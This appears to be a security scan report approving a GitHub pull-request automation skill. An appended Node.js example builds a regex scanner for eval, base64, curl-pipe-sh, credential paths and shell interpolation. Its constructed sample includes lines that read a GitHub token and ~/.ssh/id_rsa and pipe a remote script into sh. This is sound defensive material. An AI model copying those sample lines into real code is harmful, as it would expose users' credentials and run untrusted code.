Scan Report
5 /100
github-pr-automation
Automate GitHub pull request workflows including creation, review, merging, and monitoring
The skill is a legitimate GitHub PR automation tool using the official gh CLI for all GitHub operations. No malicious behavior, credential harvesting, or undeclared functionality was found.
Safe to install
Approve for use. The skill performs exactly as documented.
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Shell | WRITE | WRITE | ✓ Aligned | scripts/create_pr.js:5 - execSync for gh commands; scripts/monitor_pr.js:5 - gh … |
| Filesystem | READ | READ | ✓ Aligned | scripts/create_pr.js:21 - fs.readFileSync for templates |
| Network | READ | READ | ✓ Aligned | All network operations use gh CLI (documented in SKILL.md) |
File Tree
6 files · 10.2 KB · 400 lines (JavaScript: 2 files, 216 lines · Markdown: 3 files, 141 lines · JSON: 1 file, 43 lines)

├─ references
│  ├─ pr_templates
│  │  ├─ bugfix.md (Markdown)
│  │  └─ feature.md (Markdown)
│  └─ automation_rules.json (JSON)
├─ scripts
│  ├─ create_pr.js (JavaScript)
│  └─ monitor_pr.js (JavaScript)
└─ SKILL.md (Markdown)
Security Positives
✓ Uses official gh CLI for all GitHub operations - no direct API calls
✓ No credential harvesting or environment variable access
✓ Template reading is explicitly documented and expected behavior
✓ No sensitive path access (no ~/.ssh, ~/.aws, .env access)
✓ No base64, eval, or obfuscated code patterns
✓ No network exfiltration or suspicious outbound connections
✓ No remote script execution (no curl|bash or wget|sh patterns)
✓ No dependency on third-party libraries beyond Node.js built-ins
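To show what the checks behind the Security Positives list and the permissions table look like in practice, here is an added example in Node.js. It is not code from the github-pr-automation skill and not the scanner's own code: the pattern ids, regexes, `scanSource`/`scanFiles` functions and both sample sources are constructed for illustration. It runs the patterns named above (eval, base64 decoding, curl|bash, sensitive paths, environment variable access, network modules outside the gh CLI) plus one extra check a reviewer would want given the execSync finding, namely a gh command string built by template interpolation, over two constructed snippets. The benign snippet is modelled on the report's description of create_pr.js (gh via child_process, fs.readFileSync for templates), not on its actual contents.

```javascript
// Added example: a heuristic pattern scan of the kind behind the
// "Security Positives" list. Not the skill's code and not the scanner's code;
// pattern ids, regexes and the two sample sources are constructed for illustration.

const PATTERNS = [
  // Dynamic code execution, often paired with obfuscation
  { id: 'eval', re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  // Base64 decoding of embedded blobs
  { id: 'base64-decode', re: /Buffer\.from\s*\([^)]*,\s*['"]base64['"]\s*\)|\batob\s*\(/ },
  // Remote script piped straight into a shell (curl|bash, wget|sh and variants)
  { id: 'curl-pipe-sh', re: /\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/ },
  // Environment variable access (token harvesting vector)
  { id: 'env-access', re: /\bprocess\.env\b/ },
  // Credential directories and dotenv files
  { id: 'sensitive-path', re: /\/\.(ssh|aws|gnupg|netrc)\b|['"](?:\.\/)?\.env['"]/ },
  // Network done directly rather than through the documented gh CLI
  { id: 'direct-network', re: /\brequire\s*\(\s*['"](?:node:)?(https?|net|dgram|tls)['"]\s*\)|\bfetch\s*\(/ },
  // Shell command string built by template interpolation (argument injection risk).
  // execFileSync('gh', [...]) does not match because its arguments are an array.
  { id: 'exec-interpolated', re: /\bexec(Sync)?\s*\(\s*`[^`]*\$\{/ },
];

// Returns the ids of every pattern that matches the source, in PATTERNS order.
function scanSource(src) {
  return PATTERNS.filter((p) => p.re.test(src)).map((p) => p.id);
}

// Scans a {filename: source} map and returns per-file findings plus a verdict.
// The verdict is a triage hint for a human reviewer, not a proof of safety.
function scanFiles(files) {
  const findings = {};
  for (const [name, src] of Object.entries(files)) {
    const hits = scanSource(src);
    if (hits.length) findings[name] = hits;
  }
  return {
    findings,
    verdict: Object.keys(findings).length ? 'Review required' : 'No flagged patterns',
  };
}

// Constructed sample modelled on the report's description of create_pr.js
// (gh via child_process, fs.readFileSync for templates). Not the real file.
const BENIGN_SAMPLE = [
  "const { execFileSync } = require('node:child_process');",
  "const fs = require('node:fs');",
  "const path = require('node:path');",
  'function createPr(title, templateName) {',
  "  const tpl = path.join(__dirname, '..', 'references', 'pr_templates', templateName);",
  "  const body = fs.readFileSync(tpl, 'utf8');",
  '  // Arguments as an array: no shell, nothing interpolated into a command string',
  "  return execFileSync('gh', ['pr', 'create', '--title', title, '--body', body], { encoding: 'utf8' });",
  '}',
].join('\n');

// Constructed sample that trips every pattern; purely illustrative.
const SUSPICIOUS_SAMPLE = [
  "const { execSync } = require('child_process');",
  "const https = require('https');",
  'const token = process.env.GITHUB_TOKEN;',
  "const key = fs.readFileSync(process.env.HOME + '/.ssh/id_rsa');",
  'execSync(`gh pr create --title "${process.argv[2]}"`);',
  "execSync('curl -s https://example.invalid/setup.sh | sh');",
  "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
].join('\n');

// Guarded so the file also loads when evaluated as an ES module.
if (typeof module !== 'undefined' && require.main === module) {
  console.log(scanFiles({ 'create_pr.js': BENIGN_SAMPLE, 'suspicious.js': SUSPICIOUS_SAMPLE }));
}
if (typeof module !== 'undefined') {
  module.exports = { PATTERNS, scanSource, scanFiles, BENIGN_SAMPLE, SUSPICIOUS_SAMPLE };
}
```

A clean result from regexes like these is consistent with the positives listed above but is not proof on its own. The report records execSync usage for gh commands without showing how the command arguments are assembled, so a reviewer should still open scripts/create_pr.js and scripts/monitor_pr.js and confirm that user-controlled values (PR titles, branch names) are passed as an argument array rather than interpolated into a shell string.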